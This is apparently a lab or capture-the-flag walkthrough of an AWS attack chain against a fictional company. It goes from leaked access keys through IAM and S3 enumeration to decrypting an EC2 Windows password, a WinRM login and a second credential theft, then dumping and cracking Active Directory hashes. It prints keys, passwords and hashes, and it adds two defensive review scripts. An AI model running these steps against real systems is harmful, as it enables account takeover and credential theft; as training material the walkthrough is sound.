Leverage Insecure Storage and Backups for Profit

Scenario

Your team stumbled upon AWS credentials on a compromised IT workstation. Your mission now is to use these credentials to probe Huge Logistics’ cloud infrastructure. Dive in, seek out sensitive data, and identify accessible critical resources to determine the potential extent of exposure.

Learning Outcomes

  • IAM and S3 bucket policy enumeration
  • Obtaining the Windows administrator password from a launch key
  • PowerShell installation and configuration on Linux and Windows
  • Extracting password hashes from a local NTDS.dit
  • Cracking NT hashes
  • An understanding of how this could have been prevented

Real World Context

Exposed backups and images on file shares and buckets are a common attack vector in both on-premises and cloud infrastructure. Backups often contain a wealth of sensitive data, including user credentials, databases, configuration files, and more. Gaining access to a backup can provide an attacker with the same level of data access as compromising the primary system. Once an attacker has credentials or other sensitive data from a backup, they can use this information to move laterally and vertically within a network or cloud environment. Sensitive data is often publicly leaked on cloud storage. We can search for sensitive files using the GreyhatWarfare service.

Entry Point

Access Key: AKIAWHEOTHRFRH64EQRI
Secret Key: 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


Attack

We have credentials, so the first thing to do is configure our AWS CLI client and check whether they are valid and which account they belong to. The response gives us the account number and shows that the key belongs to a user called contractor.

❯ aws --profile pentester configure
AWS Access Key ID [None]: AKIAWHEOTHRFRH64EQRI
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]:

❯ aws --profile pentester sts get-caller-identity
{
    "UserId": "AIDAWHEOTHRFTEMEHGPPY",
    "Account": "427648302155",
    "Arn": "arn:aws:iam::427648302155:user/contractor"
}

We first check whether any policies are attached to the user and can see that there are two: Policy and AWSCompromisedKeyQuarantineV2. We don’t have permissions to the AWSCompromisedKeyQuarantineV2 policy, but we do have access to the other.

❯ aws --profile pentester iam list-attached-user-policies --user-name contractor
{
    "AttachedPolicies": [
        {
            "PolicyName": "Policy",
            "PolicyArn": "arn:aws:iam::427648302155:policy/Policy"
        },
        {
            "PolicyName": "AWSCompromisedKeyQuarantineV2",
            "PolicyArn": "arn:aws:iam::aws:policy/AWSCompromisedKeyQuarantineV2"
        }
    ]
}

We list the details of Policy and see that its default version is v4, which we will enumerate further.

❯ aws --profile pentester iam get-policy --policy-arn arn:aws:iam::427648302155:policy/Policy
{
    "Policy": {
        "PolicyName": "Policy",
        "PolicyId": "ANPAWHEOTHRFXRFIVBEXM",
        "Arn": "arn:aws:iam::427648302155:policy/Policy",
        "Path": "/",
        "DefaultVersionId": "v4",
        "AttachmentCount": 1,
        "PermissionsBoundaryUsageCount": 0,
        "IsAttachable": true,
        "CreateDate": "2023-07-27T17:39:55+00:00",
        "UpdateDate": "2023-07-28T14:24:22+00:00",
        "Tags": []
    }
}

We retrieve the details of the policy.

❯ aws --profile pentester iam get-policy-version --policy-arn arn:aws:iam::427648302155:policy/Policy --version-id v4
{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Sid": "VisualEditor0",
                    "Effect": "Allow",
                    "Action": "ec2:DescribeInstances",
                    "Resource": "*"
                },
                {
                    "Sid": "VisualEditor1",
                    "Effect": "Allow",
                    "Action": "ec2:GetPasswordData",
                    "Resource": "arn:aws:ec2:us-east-1:427648302155:instance/i-04cc1c2c7ec1af1b5"
                },
                {
                    "Sid": "VisualEditor2",
                    "Effect": "Allow",
                    "Action": [
                        "iam:GetPolicyVersion",
                        "iam:GetPolicy",
                        "iam:GetUserPolicy",
                        "iam:ListAttachedUserPolicies",
                        "s3:GetBucketPolicy"
                    ],
                    "Resource": [
                        "arn:aws:iam::427648302155:user/contractor",
                        "arn:aws:iam::427648302155:policy/Policy",
                        "arn:aws:s3:::hl-it-admin"
                    ]
                }
            ]
        },
        "VersionId": "v4",
        "IsDefaultVersion": true,
        "CreateDate": "2023-07-28T14:24:22+00:00"
    }
}

There is some interesting information here. In summary, the above policy:

  • Allows describing instances (ec2:DescribeInstances) for all resources.
  • Allows getting password data (ec2:GetPasswordData) for a specific instance (arn:aws:ec2:us-east-1:427648302155:instance/i-04cc1c2c7ec1af1b5).
  • Allows multiple IAM actions (iam:GetPolicyVersion, iam:GetPolicy, iam:GetUserPolicy, iam:ListAttachedUserPolicies).
  • Allows getting the S3 bucket policy (s3:GetBucketPolicy) for the bucket arn:aws:s3:::hl-it-admin.

Let’s start with looking at the bucket policy.

❯ aws --profile pentester s3api get-bucket-policy --bucket hl-it-admin

{
    "Policy": "{\"Version\":\"2012-10-17\",\"Statement\":[{\"Effect\":\"Allow\",\"Principal\":{\"AWS\":\"arn:aws:iam::427648302155:user/contractor\"},\"Action\":\"s3:GetObject\",\"Resource\":\"arn:aws:s3:::hl-it-admin/ssh_keys/ssh_keys_backup.zip\"}]}"
}

Whilst the above is readable, we can make the output cleaner by piping it to jq. We can see that we have access to ssh_keys_backup.zip.

❯ aws --profile pentester s3api get-bucket-policy --bucket hl-it-admin | jq -r '.Policy | fromjson'
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::427648302155:user/contractor"
      },
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::hl-it-admin/ssh_keys/ssh_keys_backup.zip"
    }
  ]
}
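
The identity policy never grants s3:GetObject; the bucket policy does, and within one account an Allow from either side is enough. The following is an added example (not part of the original write-up) that a reviewer could use to expand both documents into the access contractor actually ends up with and flag the sensitive grants; the watch-lists SENSITIVE_ACTIONS and SECRET_HINTS and all function names are assumptions made for illustration.

```python
import json
from fnmatch import fnmatchcase

# Identity policy v4 and the hl-it-admin bucket policy, copied from the output above.
IDENTITY_POLICY = json.loads("""
{"Version": "2012-10-17", "Statement": [
  {"Sid": "VisualEditor0", "Effect": "Allow",
   "Action": "ec2:DescribeInstances", "Resource": "*"},
  {"Sid": "VisualEditor1", "Effect": "Allow", "Action": "ec2:GetPasswordData",
   "Resource": "arn:aws:ec2:us-east-1:427648302155:instance/i-04cc1c2c7ec1af1b5"},
  {"Sid": "VisualEditor2", "Effect": "Allow",
   "Action": ["iam:GetPolicyVersion", "iam:GetPolicy", "iam:GetUserPolicy",
              "iam:ListAttachedUserPolicies", "s3:GetBucketPolicy"],
   "Resource": ["arn:aws:iam::427648302155:user/contractor",
                "arn:aws:iam::427648302155:policy/Policy",
                "arn:aws:s3:::hl-it-admin"]}]}
""")
BUCKET_POLICY = json.loads("""
{"Version": "2012-10-17", "Statement": [
  {"Effect": "Allow",
   "Principal": {"AWS": "arn:aws:iam::427648302155:user/contractor"},
   "Action": "s3:GetObject",
   "Resource": "arn:aws:s3:::hl-it-admin/ssh_keys/ssh_keys_backup.zip"}]}
""")
CONTRACTOR = "arn:aws:iam::427648302155:user/contractor"

# Assumption: the reviewer's own watch-lists, not an AWS-defined classification.
SENSITIVE_ACTIONS = ("ec2:GetPasswordData", "s3:GetObject")
SECRET_HINTS = ("ssh_keys", ".pem", ".ppk", "backup", "ntds")


def as_list(value):
    """Policy fields may be a single string or a list of strings."""
    return value if isinstance(value, list) else [value]


def names_principal(statement, principal_arn):
    """True if a resource-policy statement names the principal (or everyone)."""
    principal = statement.get("Principal")
    if principal == "*":
        return True
    if not isinstance(principal, dict):
        return False
    return any(p in ("*", principal_arn) for p in as_list(principal.get("AWS", [])))


def grants(policy, principal_arn=None):
    """Expand Allow statements into (action, resource) pairs.

    Actions are paired only with resources of the same service (a coarse match
    that ignores resource types). Deny, NotAction/NotResource and Condition
    are not evaluated.
    """
    pairs = []
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or "Action" not in st or "Resource" not in st:
            continue
        if principal_arn and not names_principal(st, principal_arn):
            continue
        for action in as_list(st["Action"]):
            service = action.split(":")[0].lower()
            for resource in as_list(st["Resource"]):
                parts = resource.split(":")
                res_service = parts[2] if len(parts) > 2 else "*"
                if "*" in (service, res_service) or service == res_service:
                    pairs.append((action, resource))
    return pairs


def review(identity_policy, bucket_policy, principal_arn):
    """List sensitive grants the principal gets from either policy."""
    reachable = [("identity", a, r) for a, r in grants(identity_policy)]
    reachable += [("bucket", a, r) for a, r in grants(bucket_policy, principal_arn)]
    findings = []
    for source, action, resource in reachable:
        # The policy action is treated as a pattern so "s3:*" or "*" also match.
        if any(fnmatchcase(s.lower(), action.lower()) for s in SENSITIVE_ACTIONS):
            hints = [h for h in SECRET_HINTS if h in resource.lower()]
            findings.append({"source": source, "action": action,
                             "resource": resource, "secret_hints": hints})
    return findings
```

Calling review(IDENTITY_POLICY, BUCKET_POLICY, CONTRACTOR) returns two findings: the password-data grant on the instance and the object read on the key archive.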

With this information, we download the zip file and then list its contents, which shows that there are several key pairs.

❯ aws --profile pentester s3 cp s3://hl-it-admin/ssh_keys/ssh_keys_backup.zip .
download: s3://hl-it-admin/ssh_keys/ssh_keys_backup.zip to ./ssh_keys_backup.zip

❯ unzip -l ssh_keys_backup.zip
Archive:  ssh_keys_backup.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     2590  2023-07-27 18:31   audit.pem
     2602  2023-07-27 18:31   contractor.pem
     2062  2023-07-27 18:31   contractor.ppk
     2602  2023-07-27 18:31   iam-audit.pem
     1678  2023-07-27 18:32   it-admin.pem
     1678  2023-07-27 18:32   jenkins.pem
     2602  2023-07-27 18:32   octopus-deploy.pem
     2590  2023-07-27 18:32   sunita-adm.pem
     1679  2023-07-27 18:32   viewer-dev.pem
     1428  2023-07-27 18:32   viewer-dev.ppk
---------                     -------
    21511                     10 files

So we have a list of keys for some highly privileged accounts, but we need to find out where we can leverage them. You will recall that our account has the ability to DescribeInstances on EC2 as well as GetPasswordData for a defined EC2 instance, which we will explore further.

❯ aws --profile pentester ec2 describe-instances --instance-ids i-04cc1c2c7ec1af1b5
{
    "Reservations": [
        {
            "Groups": [],
            "Instances": [
                {
                    "AmiLaunchIndex": 0,
                    "ImageId": "ami-0ae60b1f2a289b01e",
                    "InstanceId": "i-04cc1c2c7ec1af1b5",
                    "InstanceType": "t2.micro",
                    "KeyName": "it-admin",
                    "LaunchTime": "2023-07-27T18:13:47+00:00",
                    "Monitoring": {
                        "State": "disabled"
                    },
                    "Placement": {
                        "AvailabilityZone": "us-east-1b",
                        "GroupName": "",
                        "Tenancy": "default"
                    },
                    "Platform": "windows",
                    "PrivateDnsName": "ip-172-31-93-149.ec2.internal",
                    "PrivateIpAddress": "172.31.93.149",
                    "ProductCodes": [],
                    "PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
                    "PublicIpAddress": "44.204.191.38",
                    "State": {
                        "Code": 16,
                        "Name": "running"
                    },
                    "StateTransitionReason": "",
                    "SubnetId": "subnet-02700fc3bdb2a97ac",
                    "VpcId": "vpc-088b21ff238e2caed",
                    "Architecture": "x86_64",
                    "BlockDeviceMappings": [
                        {
                            "DeviceName": "/dev/sda1",
                            "Ebs": {
                                "AttachTime": "2023-07-27T18:13:48+00:00",
                                "DeleteOnTermination": true,
                                "Status": "attached",
                                "VolumeId": "vol-07411201581e71552"
                            }
                        }
                    ],
                    "ClientToken": "04674e37-22e8-44b8-afff-94f5e36a4356",
                    "EbsOptimized": false,
                    "EnaSupport": true,
                    "Hypervisor": "xen",
                    "NetworkInterfaces": [
                        {
                            "Association": {
                                "IpOwnerId": "amazon",
                                "PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
                                "PublicIp": "44.204.191.38"
                            },
                            "Attachment": {
                                "AttachTime": "2023-07-27T18:13:47+00:00",
                                "AttachmentId": "eni-attach-039c3eace03c5924e",
                                "DeleteOnTermination": true,
                                "DeviceIndex": 0,
                                "Status": "attached",
                                "NetworkCardIndex": 0
                            },
                            "Description": "",
                            "Groups": [
                                {
                                    "GroupName": "launch-wizard-19",
                                    "GroupId": "sg-0ae31edc4377d337b"
                                }
                            ],
                            "Ipv6Addresses": [],
                            "MacAddress": "12:7b:11:42:a4:0d",
                            "NetworkInterfaceId": "eni-070802f93fd899fe9",
                            "OwnerId": "427648302155",
                            "PrivateDnsName": "ip-172-31-93-149.ec2.internal",
                            "PrivateIpAddress": "172.31.93.149",
                            "PrivateIpAddresses": [
                                {
                                    "Association": {
                                        "IpOwnerId": "amazon",
                                        "PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
                                        "PublicIp": "44.204.191.38"
                                    },
                                    "Primary": true,
                                    "PrivateDnsName": "ip-172-31-93-149.ec2.internal",
                                    "PrivateIpAddress": "172.31.93.149"
                                }
                            ],
                            "SourceDestCheck": true,
                            "Status": "in-use",
                            "SubnetId": "subnet-02700fc3bdb2a97ac",
                            "VpcId": "vpc-088b21ff238e2caed",
                            "InterfaceType": "interface"
                        }
                    ],
                    "RootDeviceName": "/dev/sda1",
                    "RootDeviceType": "ebs",
                    "SecurityGroups": [
                        {
                            "GroupName": "launch-wizard-19",
                            "GroupId": "sg-0ae31edc4377d337b"
                        }
                    ],
                    "SourceDestCheck": true,
                    "Tags": [
                        {
                            "Key": "Name",
                            "Value": "Backup"
                        }
                    ],
                    "VirtualizationType": "hvm",
                    "CpuOptions": {
                        "CoreCount": 1,
                        "ThreadsPerCore": 1
                    },
                    "CapacityReservationSpecification": {
                        "CapacityReservationPreference": "open"
                    },
                    "HibernationOptions": {
                        "Configured": false
                    },
                    "MetadataOptions": {
                        "State": "applied",
                        "HttpTokens": "optional",
                        "HttpPutResponseHopLimit": 1,
                        "HttpEndpoint": "enabled",
                        "HttpProtocolIpv6": "disabled",
                        "InstanceMetadataTags": "disabled"
                    },
                    "EnclaveOptions": {
                        "Enabled": false
                    },
                    "PlatformDetails": "Windows",
                    "UsageOperation": "RunInstances:0002",
                    "UsageOperationUpdateTime": "2023-07-27T18:13:47+00:00",
                    "PrivateDnsNameOptions": {
                        "HostnameType": "ip-name",
                        "EnableResourceNameDnsARecord": true,
                        "EnableResourceNameDnsAAAARecord": false
                    },
                    "MaintenanceOptions": {
                        "AutoRecovery": "default"
                    },
                    "CurrentInstanceBootMode": "legacy-bios"
                }
            ],
            "OwnerId": "427648302155",
            "ReservationId": "r-005e5ae930185ce9f"
        }
    ]
}

There is a LOT of information above. Whilst we could filter this for the key information via the AWS CLI, I personally find it easier to use jq to extract what we need to move forward.

❯ aws --profile pentester ec2 describe-instances --instance-ids i-04cc1c2c7ec1af1b5 | jq -r '.Reservations[].Instances[] | {InstanceId, InstanceType, KeyName, LaunchTime, PrivateIpAddress, PublicIpAddress, PublicDnsName, PlatformDetails, State: .State.Name, AvailabilityZone: .Placement.AvailabilityZone, SubnetId, VpcId, SecurityGroups, Tags}'
{
  "InstanceId": "i-04cc1c2c7ec1af1b5",
  "InstanceType": "t2.micro",
  "KeyName": "it-admin",
  "LaunchTime": "2023-07-27T18:13:47+00:00",
  "PrivateIpAddress": "172.31.93.149",
  "PublicIpAddress": "44.204.191.38",
  "PublicDnsName": "ec2-44-204-191-38.compute-1.amazonaws.com",
  "PlatformDetails": "Windows",
  "State": "running",
  "AvailabilityZone": "us-east-1b",
  "SubnetId": "subnet-02700fc3bdb2a97ac",
  "VpcId": "vpc-088b21ff238e2caed",
  "SecurityGroups": [
    {
      "GroupName": "launch-wizard-19",
      "GroupId": "sg-0ae31edc4377d337b"
    }
  ],
  "Tags": [
    {
      "Key": "Name",
      "Value": "Backup"
    }
  ]
}

We can see that this instance was launched using the it-admin SSH key (which we have), along with its public IP and DNS name, and that it is running Windows. Our assumption is that it is running either SSH, RDP or WinRM, so we run masscan against the target, which confirms that port 5985 (WinRM) is open.

sudo masscan -p- -e tun0 --rate=10000 44.204.191.38
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-07-03 03:57:58 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 5985/tcp on 44.204.191.38
rate:  0.00-kpps, 100.00% done

We then retrieve the password.

❯ aws --profile pentester ec2 get-password-data --instance-id i-04cc1c2c7ec1af1b5 --priv-launch-key it-admin.pem
{
    "InstanceId": "i-04cc1c2c7ec1af1b5",
    "PasswordData": "UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!",
    "Timestamp": "2023-07-27T22:39:26+00:00"
}

If the private key isn’t specified, or isn’t in the path the command is executed from, you will get encrypted password data.

As WinRM is open and we know the password, we can use evil-winrm to connect. Unfortunately this didn’t work: the shell fails because Invoke-Expression is not recognized on the endpoint, so there must be additional security measures in place.

❯ evil-winrm -i 44.204.191.38 -u Administrator -p 'UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS The term 'Invoke-Expression' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.    + CategoryInfo
 : ObjectNotFound: (Invoke-Expression:String) [], CommandNotFoundException    + FullyQualifiedErrorId : CommandNotFoundException>

Time for Plan B: we shall use PowerShell. Whilst I appreciate that Linux has PowerShell, it is less headache and stress to just run this from a Windows box, so I connect to one via RDP and execute the commands from there. I use the command xfreerdp /u:username /p:password /v:1.2.3.4 /dynamic-resolution /drive:home/,. +clipboard, which gives me access to the Home drive on my computer as well as clipboard access.

PS C:\ > $password = ConvertTo-SecureString -AsPlainText -Force -String 'UZ$abRnO!bPj@KQk%BSEaB*IO%reJIX!'
PS C:\ > $credential = New-Object System.Management.Automation.PSCredential "Administrator",$password
PS C:\ > Enter-PSSession -ComputerName 44.204.191.38 -Credential $credential

We got an error and, after some troubleshooting, ended up doing the following:

PS C:\ > winrm quickconfig
WinRM is not set up to receive requests on this machine.
The following changes must be made:

Start the WinRM service.
Set the WinRM service type to delayed auto start.

Make these changes [y/n]? y

WinRM has been updated to receive requests.

WinRM service type changed successfully.
WinRM service started.
WSManFault
    Message
        ProviderFault
            WSManFault
                Message = WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.

Error number:  -2144108183 0x80338169
WinRM firewall exception will not work since one of the network connection types on this machine is set to Public. Change the network connection type to either Domain or Private and try again.
PS C:\ > Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*"
>>

WinRM Security Configuration.
This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be authenticated. The client might send credential information to these
computers. Are you sure that you want to modify this list?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y

After this we are able to connect.

PS C:\ > Enter-PSSession -ComputerName 44.204.191.38 -Credential $credential
[44.204.191.38]: PS>whoami
winrm virtual users\winrm va_115_veeamprox02_administrator
[44.204.191.38]: PS>

We aren’t able to run basic commands such as ls or dir without getting an error message, so we ran get-command which gave us the subset of commands that we have to work with.

[44.204.191.38]: PS>get-command

CommandType     Name                                               Version    Source
-----------     ----                                               -------    ------
Function        Clear-Host
Function        Exit-PSSession
Function        Get-Command
Function        Get-FormatData
Function        Get-Help
Function        Measure-Object
Function        Out-Default
Function        Select-Object
Cmdlet          Get-ChildItem                                      3.0.0.0    Microsoft.PowerShell.Management
Cmdlet          Get-Content                                        3.0.0.0    Microsoft.PowerShell.Management
Cmdlet          Get-Process                                        3.0.0.0    Microsoft.PowerShell.Management
Cmdlet          Get-Service                                        3.0.0.0    Microsoft.PowerShell.Management

There is not much in the default Administrator account, but there is another account called admin whose profile contains a .aws directory, where we find another set of keys that we can use.

[44.204.191.38]: PS>get-childitem c:\users\admin -force


    Directory: C:\users\admin


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/28/2023  11:38 AM                .aws
d-r---        7/28/2023  11:35 AM                3D Objects
d--h--       11/14/2018   4:17 PM                AppData
d--hsl        7/28/2023  11:35 AM                Application Data
d-r---        7/28/2023  11:35 AM                Contacts
d--hsl        7/28/2023  11:35 AM                Cookies
d-r---        7/28/2023  11:35 AM                Desktop
< --- snip --- >

[44.204.191.38]: PS>get-content c:\users\admin\.aws\credentials
[default]
aws_access_key_id = AKIAWHEOTHRFT5Q4524N
aws_secret_access_key = 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

With these credentials, we can finally return to Linux. We update our configuration, verify the keys, and see that we are it-admin.

❯ aws --profile admin configure
AWS Access Key ID [None]: AKIAWHEOTHRFT5Q4524N
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]:


❯ aws --profile admin sts get-caller-identity
{
    "UserId": "AIDAWHEOTHRFWB4TQKI2X",
    "Account": "427648302155",
    "Arn": "arn:aws:iam::427648302155:user/it-admin"
}

We go back and look at the S3 bucket from earlier, where we can see an ntds.dit file, which is an Active Directory database. We shall definitely download that and extract the hashes.

❯ aws --profile admin s3 ls s3://hl-it-admin --recursive
2023-07-28 20:35:38          0 backup-2807/
2023-07-28 23:52:58   33554432 backup-2807/ad_backup/Active Directory/ntds.dit
2023-07-28 23:53:07      16384 backup-2807/ad_backup/Active Directory/ntds.jfm
2023-07-28 23:53:06      65536 backup-2807/ad_backup/registry/SECURITY
2023-07-28 23:52:58   17825792 backup-2807/ad_backup/registry/SYSTEM
2023-07-27 23:51:45         99 contractor_accessKeys.csv
2023-07-28 19:50:49          0 docs/
2023-07-28 19:51:07   10591957 docs/veeam_backup_12_agent_management_guide.pdf
2023-07-28 19:51:09    9408343 docs/veeam_backup_12_cloud_administrator_guide.pdf
2023-07-28 19:47:07         32 flag.txt
2023-07-27 23:53:06          0 installer/
2023-07-28 05:02:47 1579290624 installer/Veeam.iso
2023-07-28 01:34:24          0 ssh_keys/
2023-07-28 21:48:18      17483 ssh_keys/ssh_keys_backup.zip

We shall download the backup-2807 folder to our local machine.

❯ aws --profile admin s3 cp s3://hl-it-admin/backup-2807 . --recursive
download: s3://hl-it-admin/backup-2807/ad_backup/Active Directory/ntds.jfm to ad_backup/Active Directory/ntds.jfm
download: s3://hl-it-admin/backup-2807/ad_backup/registry/SECURITY to ad_backup/registry/SECURITY
download: s3://hl-it-admin/backup-2807/ad_backup/registry/SYSTEM to ad_backup/registry/SYSTEM
download: s3://hl-it-admin/backup-2807/ad_backup/Active Directory/ntds.dit to ad_backup/Active Directory/ntds.dit

We use impacket-secretsdump to dump all the hashes.

❯ impacket-secretsdump -ntds ad_backup/Active\ Directory/ntds.dit -system ad_backup/registry/SYSTEM local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x8e47e7e457e33035cfabaea711975407
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 6df8fdd3a446ef9ed1a64c6a03a28ce2
[*] Reading and decrypting hashes from ad_backup/Active Directory/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC04$:1003:aad3b435b51404eeaad3b435b51404ee:fc15058af730b1de899a7aa6759e894c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb22f21bc86dfe7b0073d9f9f722ae0e:::
huge-logistics.local\leandra.joice:1232:aad3b435b51404eeaad3b435b51404ee:84cfc9ded98b57bcc517375c5911ca2c:::
huge-logistics.local\leigh.simone:1233:aad3b435b51404eeaad3b435b51404ee:ad32cc080b0aeb6531200bdaef08adb6:::
huge-logistics.local\hilliary.kim:1234:aad3b435b51404eeaad3b435b51404ee:52edd5f46cf02573d5e2392c67fa0183:::
huge-logistics.local\melanie.ashlie:1235:aad3b435b51404eeaad3b435b51404ee:58f507bbf45e920e5f3af9ea39bf8407:::
< -- snip -- >

We will clean this up and then write it to a file for cracking the hashes. With all the hashes in Vim, we removed the unnecessary lines at the top, visually selected all the lines, and in command mode entered awk -F ":" '{print $4}'. This returns all the NT hash values, at which point we write them out to a file.

Using hashcat with the command hashcat -m 1000 hashes /usr/share/wordlist/rockyou.txt we got the following passwords:

c52abb1e14677d7ea228fcc1171ed7b7:daniel
89c99393bfe3c0a95deba6dcb0b12b43:123abc
a4a02c448197f67cd9e982a5e5d0acc3:rabbit
1674049edd3d39cead200b0fee90982a:knight
89492d216d0a212f8ed54fc5ac9d340b:qazwsxedc
4d4df769e6b9b338fabda5846cf85792:<redacted>
31d6cfe0d16ae931b73c59d7e0c089c0:
58a478135a93ac3bf058a5ea0e8fdb71:Password123

We got a little creative and then decided to match the usernames with the passwords:

while IFS=':' read -r key password; do grep -F "$key" hashdump | sed "s/$key/$key:$password/"; done < cracked_passwords
huge-logistics.local\rebeca.juliette:1359:aad3b435b51404eeaad3b435b51404ee:c52abb1e14677d7ea228fcc1171ed7b7:daniel:::
mssql_svc:1362:aad3b435b51404eeaad3b435b51404ee:89c99393bfe3c0a95deba6dcb0b12b43:123abc:::
huge-logistics.local\blair.rosabella:1358:aad3b435b51404eeaad3b435b51404ee:a4a02c448197f67cd9e982a5e5d0acc3:rabbit:::
huge-logistics.local\ketty.carma:1261:aad3b435b51404eeaad3b435b51404ee:1674049edd3d39cead200b0fee90982a:knight:::
huge-logistics.local\lanette.kiele:1278:aad3b435b51404eeaad3b435b51404ee:89492d216d0a212f8ed54fc5ac9d340b:qazwsxedc:::
huge-logistics.local\hali.lombard:1238:aad3b435b51404eeaad3b435b51404ee:4d4df769e6b9b338fabda5846cf85792:<redacted>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:Password123:::
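
The loop above uses each hash as a sed pattern and each password as the replacement text, so a password containing / or & would corrupt the output. The following is an added example (not part of the original write-up) that does the same join as a password-audit report for the account owners, parsing the secretsdump and hashcat formats directly and reporting only password length rather than the plaintext; the function names and the report layout are assumptions made for illustration.

```python
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# A subset of the secretsdump lines and hashcat results shown above.
HASHDUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC04$:1003:aad3b435b51404eeaad3b435b51404ee:fc15058af730b1de899a7aa6759e894c:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fb22f21bc86dfe7b0073d9f9f722ae0e:::
huge-logistics.local\leandra.joice:1232:aad3b435b51404eeaad3b435b51404ee:84cfc9ded98b57bcc517375c5911ca2c:::
huge-logistics.local\rebeca.juliette:1359:aad3b435b51404eeaad3b435b51404ee:c52abb1e14677d7ea228fcc1171ed7b7:::
mssql_svc:1362:aad3b435b51404eeaad3b435b51404ee:89c99393bfe3c0a95deba6dcb0b12b43:::
"""
CRACKED = """
c52abb1e14677d7ea228fcc1171ed7b7:daniel
89c99393bfe3c0a95deba6dcb0b12b43:123abc
31d6cfe0d16ae931b73c59d7e0c089c0:
58a478135a93ac3bf058a5ea0e8fdb71:Password123
"""


def parse_dump(text):
    """Parse 'domain\\uid:rid:lmhash:nthash:::' lines into dicts."""
    accounts = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            continue  # skips blank lines and '[*] ...' banner lines
        domain, _, user = fields[0].rpartition("\\")
        accounts.append({"domain": domain, "user": user,
                         "rid": int(fields[1]), "nt": fields[3].lower()})
    return accounts


def parse_cracked(text):
    """Parse hashcat 'hash:plaintext' lines; the plaintext may contain ':'."""
    cracked = {}
    for line in text.splitlines():
        nt, sep, plain = line.partition(":")
        if sep and len(nt) == 32:
            cracked[nt.lower()] = plain
    return cracked


def audit(dump_text, cracked_text):
    """Return (user, rid, reasons) for every account that needs a reset.

    Plaintexts are used only to derive a length, so the report can be shared
    without spreading the recovered passwords further.
    """
    accounts = parse_dump(dump_text)
    cracked = parse_cracked(cracked_text)
    by_hash = defaultdict(list)
    for acct in accounts:
        by_hash[acct["nt"]].append(acct["user"])

    findings = []
    for acct in accounts:
        reasons = []
        if acct["nt"] == EMPTY_NT:
            reasons.append("empty password")
        elif acct["nt"] in cracked:
            reasons.append("recovered from wordlist, length %d" % len(cracked[acct["nt"]]))
        others = len(by_hash[acct["nt"]]) - 1
        if others:
            reasons.append("hash shared with %d other account(s)" % others)
        if reasons and acct["rid"] == 500:
            reasons.append("built-in Administrator (RID 500)")
        if reasons:
            findings.append((acct["user"], acct["rid"], reasons))
    return sorted(findings, key=lambda f: f[1])  # built-in accounts first


if __name__ == "__main__":
    for user, rid, reasons in audit(HASHDUMP, CRACKED):
        print("%-18s rid=%-5d %s" % (user, rid, "; ".join(reasons)))
```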

PWNED!